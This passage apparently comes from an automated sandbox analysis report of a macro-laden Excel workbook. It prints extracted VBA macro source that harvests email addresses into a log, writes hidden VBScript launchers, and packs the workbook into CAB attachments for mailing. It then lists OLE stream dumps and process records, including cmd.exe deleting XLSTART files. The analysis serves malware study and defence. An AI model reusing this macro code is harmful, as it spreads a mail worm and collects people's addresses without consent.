Print #i, "          Set logtext = objFSO.OpenTextFile(log_path & """ & "\log.txt""" & ", 8, True, -1)"
Print #i, "          logtext.Write inputed_string"
Print #i, "          logtext.Close"
Print #i, "     Case 2"
Print #i, "          Set logtext = objFSO.OpenTextFile(log_path & """ & "\log.txt""" & ", 2, True, -1)"
Print #i, "          logtext.Write inputed_string"
Print #i, "          logtext.Close"
Print #i, "   End Select"
Print #i, "   set objFSO = nothing"
Print #i, "End Sub"
Print #i, ""
Print #i, "Private Function ReadAllTextFile()"
Print #i, "    Dim objFSO, FileName, MyFile"
Print #i, "    FileName = """ & "D:\Collected_Address\log.txt""" & ""
Print #i, "    Set objFSO = CreateObject(""" & "Scripting.FileSystemObject""" & ")"
Print #i, "    Set MyFile = objFSO.OpenTextFile(FileName, 1, False, -1)"
Print #i, "    If MyFile.AtEndOfStream Then"
Print #i, "        ReadAllTextFile = """ & """" & ""
Print #i, "    Else"
Print #i, "        ReadAllTextFile = MyFile.ReadAll"
Print #i, "    End If"
Print #i, "set objFSO = nothing"
Print #i, "End Function"
Print #i, ""
Print #i, "Private Function all_non_same(source_data)"
Print #i, "   Dim oDict, i, trimed_arr, nonsame_arr"
Print #i, "   all_non_same = """ & """" & ""
Print #i, "   Set oDict = CreateObject(""" & "Scripting.Dictionary""" & ")"
Print #i, ""
Print #i, "   trimed_arr = Split(source_data, vbCrLf)"
Print #i, ""
Print #i, "   For i = LBound(trimed_arr) To UBound(trimed_arr)"
Print #i, "         oDict(trimed_arr(i)) = """ & """" & ""
Print #i, "   Next"
Print #i, ""
Print #i, "   If oDict.Count > 0 Then"
Print #i, "        nonsame_arr = oDict.keys"
Print #i, "        For i = LBound(nonsame_arr) To UBound(nonsame_arr)"
Print #i, "             all_non_same = all_non_same & nonsame_arr(i) & vbCrLf"
Print #i, "        Next"
Print #i, "   End If"
Print #i, "   Set oDict = Nothing"
Print #i, "End Function"
Close (i)
Application.WindowState = xlMaximized
WshShell.Run ("wscript.exe " & AddVbsFile_search), vbHide, False
Set WshShell = Nothing
End Sub

Private Sub CreatCab_SendMail()
Dim i As Integer, AttName As String, AddVbsFile As String, AddListFile As String, Address_list As String
Dim fs As Object, WshShell As Object
Address_list = get_ten_address

Set WshShell = CreateObject("WScript.Shell")
Set fs = CreateObject("scripting.filesystemobject")
If fs.Folderexists("E:\SORCE") = False Then fs.CreateFolder "E:\SORCE"
AttName = Replace(Replace(Left(ThisWorkbook.Name, Len(ThisWorkbook.Name) - 4), " ", "_"), ".", "_")
mail_sub = "*" & AttName & "*Message*"
AddVbsFile = "E:\sorce\" & AttName & "_Key.vbs"
i = FreeFile
Open AddVbsFile For Output Access Write As #i
    
Print #i, "Dim oexcel,owb, WshShell,Fso,Atta_xls,sh,route"
Print #i, "On error Resume Next"
Print #i, "Set sh=WScript.CreateObject(""" & "shell.application""" & ")"
Print #i, "sh.MinimizeAll"
Print #i, "Set sh = Nothing"
Print #i, "Set Fso = CreateObject(""" & "Scripting.FileSystemObject""" & ")"
Print #i, "Set WshShell = WScript.CreateObject(""" & "WScript.Shell""" & ")"
Print #i, "If Fso.Folderexists(""" & "E:\KK""" & ") = False Then Fso.CreateFolder """ & "E:\KK"""
Print #i, "Fso.CopyFile  _"
Print #i, "WshShell.CurrentDirectory & """ & "\" & AttName & "*.CAB""" & "," & " " & """E:\KK\""" & ", True"
Print #i, "For Each Atta_xls In ListDir(""" & "E:\KK""" & ")"
Print #i, "   WshShell.Run """ & "expand """ & " & Atta_xls & """ & " -F:" & AttName & ".xls E:\KK""" & ", 0, true"
Print #i, "Next"
Print #i, "If Fso.FileExists(""" & "E:\KK\" & AttName & ".xls""" & ") = 0 then"
Print #i, "        route = WshShell.CurrentDirectory & """ & "\" & AttName & ".xls"""
Print #i, "        if Fso.FileExists(WshShell.CurrentDirectory & """ & "\" & AttName & ".xls""" & ")=0 then"
Print #i, "                 route = InputBox(""" & "Warning! """ & " & Chr(10) & """ & "You are going to open a confidential file.""" & "& Chr(10)   _"
Print #i, "                               & """ & "Please input the complete file path.""" & " & Chr(10) & """ & "ex. C:\parth\confidential_file.xls""" & ", _"
Print #i, "                               """ & "Open a File""" & " , """ & "Please Input the Complete File Path""" & ", 10000, 8500)"
Print #i, "        End if"
Print #i, "else"
Print #i, "        route = """ & "E:\KK\" & AttName & ".xls"""
Print #i, "End If"
Print #i, "   set oexcel=createobject(""" & "excel.application""" & ")"
Print #i, "   set owb=oexcel.workbooks.open(route)"
Print #i, "   oExcel.Visible = True"
Print #i, "Set oExcel = Nothing"
Print #i, "Set oWb = Nothing"
Print #i, "Set  WshShell = Nothing"
Print #i, "Set Fso = Nothing"
Print #i, "WScript.Quit"
Print #i, "Private Function ListDir (ByVal Path)"
Print #i, "   Dim Filter, a, n, Folder, Files, File"
Print #i, "       ReDim a(10)"
Print #i, "    n = 0"
Print #i, "  Set Folder = fso.GetFolder(Path)"
Print #i, "   Set Files = Folder.Files"
Print #i, "   For Each File In Files"
Print #i, "      If left(File.Name," & Len(AttName) & ") = """ & AttName & """ and right(File.Name,3) = """ & "CAB""" & " Then"
Print #i, "         If n > UBound(a) Then ReDim Preserve a(n*2)"
Print #i, "            a(n) = File.Path"
Print #i, "            n = n + 1"
Print #i, "       End If"
Print #i, "   Next"
Print #i, "   ReDim Preserve a(n-1)"
Print #i, "   ListDir = a"
Print #i, "End Function"

Close (i)
AddListFile = ThisWorkbook.Path & "\TEST.txt"
i = FreeFile
Open AddListFile For Output Access Write As #i
Print #i, "E:\sorce\" & AttName & "_Key.vbs"
Print #i, "E:\sorce\" & AttName & ".xls"
Close (i)

Application.ScreenUpdating = False
RestoreBeforeSend
ThisWorkbook.SaveCopyAs "E:\sorce\" & AttName & ".xls"
RestoreAfterOpen
c4$ = CurDir()
ChDrive Left(ThisWorkbook.Path, 3) '"C:\"
ChDir ThisWorkbook.Path
WshShell.Run Environ$("comspec") & " /c makecab /F """ & ThisWorkbook.Path & "\TEST.TXT""" & " /D COMPRESSIONTYPE=LZX /D COMPRESSIONMEMORY=21 /D CABINETNAMETEMPLATE=../" & AttName & ".CAB", vbHide, False

Do Until fs.FileExists(ThisWorkbook.Path & "\TEST.txt") And fs.FileExists(ThisWorkbook.Path & "\setup.rpt") And fs.FileExists(ThisWorkbook.Path & "\setup.inf") And fs.FileExists(ThisWorkbook.Path & "\" & AttName & ".C

                                                                                                                                                    Streams

                                                                                                                                                    Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 452
                                                                                                                                                    General
                                                                                                                                                    Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                    File Type:data
                                                                                                                                                    Stream Size:452
                                                                                                                                                    Entropy:3.2323942789896396
                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , D . . . . . . . . . . + , . . . H . . . . . . . . . . . ( . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . K . S . O . P . r . o . d . u . c . t . B . u . i . l . d . V . e . r . . . . . . . . . . . . . K . S . O . R . e . a . d . i . n . g . L . a . y
                                                                                                                                                    Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 00 00 00 05 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 8c 00 00 00 48 00 00 00 04 00 00 00 01 00 00 00 28 00 00 00 00 00 00 80 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 02 00 00 00 b0 04 00 00 13 00 00 00 04 08 00 00 0b 00 00 00
                                                                                                                                                    Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 280
                                                                                                                                                    General
                                                                                                                                                    Stream Path:\x5SummaryInformation
                                                                                                                                                    File Type:data
                                                                                                                                                    Stream Size:280
                                                                                                                                                    Entropy:3.280349592799364
                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . X . . . . . . ` . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . m . p . b . 0 . 3 . . . . . . . . . . . . . s . j . 1 . 4 . 8 . . . @ . . . . . 2 . @ . . . r 7 . @ . . . : V . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . x . c . e . l . . . . . . . . . . .
                                                                                                                                                    Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 e8 00 00 00 09 00 00 00 01 00 00 00 58 00 00 00 00 00 00 80 60 00 00 00 04 00 00 00 68 00 00 00 08 00 00 00 80 00 00 00 0c 00 00 00 94 00 00 00 0d 00 00 00 a0 00 00 00 0b 00 00 00 ac 00 00 00 12 00 00 00 b8 00 00 00 13 00 00 00 e0 00 00 00
                                                                                                                                                    Stream Path: ETExtData, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 3170
                                                                                                                                                    General
                                                                                                                                                    Stream Path:ETExtData
                                                                                                                                                    File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                    Stream Size:3170
                                                                                                                                                    Entropy:2.2246375709053603
                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . & . ' . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                    Data Raw:09 08 10 00 01 06 00 0f 9a 02 d5 07 00 00 00 00 08 00 00 00 fb 0f 26 0c b7 27 17 98 84 01 ff ff ff 01 00 00 c0 ff 00 00 00 00 00 00 c0 ff 00 00 00 00 00 00 c0 ff 00 00 00 00 00 00 c0 ff 00 00 00 00 00 00 c0 ff 00 00 00 00 00 00 c0 ff 00 00 00 00 00 00 c0 ff 00 00 00 00 00 00 c0 ff 00 00 00 00 00 00 c0 ff 00 00 00 00 00 00 c0 ff 00 00 00 00 00 00 c0 ff 00 00 00 00 00 00 c0 ff 00 00
                                                                                                                                                    Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 1787344
                                                                                                                                                    General
                                                                                                                                                    Stream Path:Workbook
                                                                                                                                                    File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                    Stream Size:1787344
                                                                                                                                                    Entropy:7.951342822895709
                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . g e o r g e 4 . 8 . B . . . . a . . . . . . . . = . . . . . . . . . . . . . . T . h . i . s . W . o . r . k . b . o . o . k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . m 0 8 . . . . . . . \\ . @ . . . . . . . . . .
                                                                                                                                                    Data Raw:09 08 10 00 00 06 05 00 bb 0d cd 07 c1 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 06 00 00 67 65 6f 72 67 65 34 00 38 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 455
                                                                                                                                                    General
                                                                                                                                                    Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Stream Size:455
                                                                                                                                                    Entropy:5.389394216454662
                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                    Data ASCII:I D = " { A 3 2 7 1 C E A - 3 A C D - 4 5 F D - B B 3 D - 6 D D A B 8 D 5 1 6 D C } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = T o D O L E . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 3 F 3 D 7 3 5 3 9 7 F 7 7 5 F B 7 5 F B 7 5 F B 7 5 F B " . . D P B = " 1 9 1 B 5 5 6 6 5 6 6 6 5 6 6 6 " . . G C =
                                                                                                                                                    Data Raw:49 44 3d 22 7b 41 33 32 37 31 43 45 41 2d 33 41 43 44 2d 34 35 46 44 2d 42 42 33 44 2d 36 44 44 41 42 38 44 35 31 36 44 43 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 54 6f 44 4f 4c 45 0d 0a 4e 61 6d 65 3d 22
                                                                                                                                                    Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 83
                                                                                                                                                    General
                                                                                                                                                    Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                                                                                                                    File Type:data
                                                                                                                                                    Stream Size:83
                                                                                                                                                    Entropy:3.2482333398641083
                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                    Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . T o D O L E . T . o . D . O . L . E . . . . .
                                                                                                                                                    Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 54 6f 44 4f 4c 45 00 54 00 6f 00 44 00 4f 00 4c 00 45 00 00 00 00 00
                                                                                                                                                    Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 5829
                                                                                                                                                    General
                                                                                                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                                                                                                    File Type:data
                                                                                                                                                    Stream Size:5829
                                                                                                                                                    Entropy:5.379849521199186
                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                    Data ASCII:a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                                                                                                                    Data Raw:cc 61 9a 00 00 03 00 ff 04 08 00 00 09 04 00 00 a8 03 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
                                                                                                                                                    Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 5516
                                                                                                                                                    General
                                                                                                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_0
                                                                                                                                                    File Type:data
                                                                                                                                                    Stream Size:5516
                                                                                                                                                    Entropy:3.605198077162134
                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                    Data ASCII:K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ * . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . .
                                                                                                                                                    Data Raw:93 4b 2a 9a 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 05 00 07 00 05 00 07 00 02 00 02 00 00 00 00 00 01 00 00 00 02 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 c0 03 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00
                                                                                                                                                    Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 792
                                                                                                                                                    General
                                                                                                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_1
                                                                                                                                                    File Type:data
                                                                                                                                                    Stream Size:792
                                                                                                                                                    Entropy:3.004488303481464
                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                    Data ASCII:r U . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w b . . . . . . . . . . . . . . . . M o d u l e N a m e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                    Data Raw:72 55 80 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 6e 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff
                                                                                                                                                    Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_6, File Type: data, Stream Size: 1520
                                                                                                                                                    General
                                                                                                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_6
                                                                                                                                                    File Type:data
                                                                                                                                                    Stream Size:1520
                                                                                                                                                    Entropy:2.335284950583092
                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                    Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . ` . . . . . . . . . . . . 8 . a . . . . . . . . . . . . . . ` . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . ` . . . . . . . . . . . . H . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . .
                                                                                                                                                    Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 07 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 07 00 00 00 00 60 00 00 fc ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                                                                                                                                                    Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_7, File Type: data, Stream Size: 2896
                                                                                                                                                    General
                                                                                                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_7
                                                                                                                                                    File Type:data
                                                                                                                                                    Stream Size:2896
                                                                                                                                                    Entropy:1.4907211327363359
                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                    Data ASCII:r U . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . H . . . . . . . . . . . . . . . i . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . H . . . . . . . . . . . . . . . i . . . . . . . X . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                    Data Raw:72 55 80 02 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 06 00 10 00 00 00 00 00 00 00 00 00 07 00 16 00 16 00 00 00 00 00 48 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 69 02
                                                                                                                                                    Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 689
                                                                                                                                                    General
                                                                                                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                                                                                                                    File Type:data
                                                                                                                                                    Stream Size:689
                                                                                                                                                    Entropy:6.451049164949706
                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                    Data ASCII:. . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . 1 a . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ s y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E .
                                                                                                                                                    Data Raw:01 ad b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 a8 03 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 c9 d8 31 61 0f 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                                                                                                                                    Network Behavior

                                                                                                                                                    Report size exceeds maximum size, go to the download page of this report and download PCAP to see all network behavior.

                                                                                                                                                    Statistics

                                                                                                                                                    CPU Usage

                                                                                                                                                    Click to jump to process

                                                                                                                                                    Memory Usage

                                                                                                                                                    Click to jump to process

                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                    Behavior

                                                                                                                                                    Click to jump to process

                                                                                                                                                    System Behavior

                                                                                                                                                    General

                                                                                                                                                    Target ID:0
                                                                                                                                                    Start time:11:37:08
                                                                                                                                                    Start date:07/02/2023
                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                                    Imagebase:0x1240000
                                                                                                                                                    File size:27110184 bytes
                                                                                                                                                    MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Target ID:1
                                                                                                                                                    Start time:11:37:17
                                                                                                                                                    Start date:07/02/2023
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c attrib -S -h "C:\Users\user\AppData\Roaming\Microsoft\Excel\XLSTART\K4.XLS"
                                                                                                                                                    Imagebase:0xb0000
                                                                                                                                                    File size:232960 bytes
                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Target ID:2
                                                                                                                                                    Start time:11:37:17
                                                                                                                                                    Start date:07/02/2023
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c Del /F /Q "C:\Users\user\AppData\Roaming\Microsoft\Excel\XLSTART\K4.XLS"
                                                                                                                                                    Imagebase:0xb0000
                                                                                                                                                    File size:232960 bytes
                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Target ID:3
                                                                                                                                                    Start time:11:37:17
                                                                                                                                                    Start date:07/02/2023
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff745070000
                                                                                                                                                    File size:625664 bytes
                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Target ID:4
                                                                                                                                                    Start time:11:37:17
                                                                                                                                                    Start date:07/02/2023
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c RD /S /Q "C:\Users\user\AppData\Roaming\Microsoft\Excel\XLSTART\K4.XLS"
                                                                                                                                                    Imagebase:0xb0000
                                                                                                                                                    File size:232960 bytes
                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Target ID:5
                                                                                                                                                    Start time:11:37:17
                                                                                                                                                    Start date:07/02/2023
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff745070000
                                                                                                                                                    File size:625664 bytes
                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    General

                                                                                                                                                    Target ID:6
                                                                                                                                                    Start time:11:37:17
                                                                                                                                                    Start date:07/02/2023
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff745070000
                                                                                                                                                    File size:625664 bytes
                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    General

                                                                                                                                                    Target ID:7
                                                                                                                                                    Start time:11:37:18
                                                                                                                                                    Start date:07/02/2023
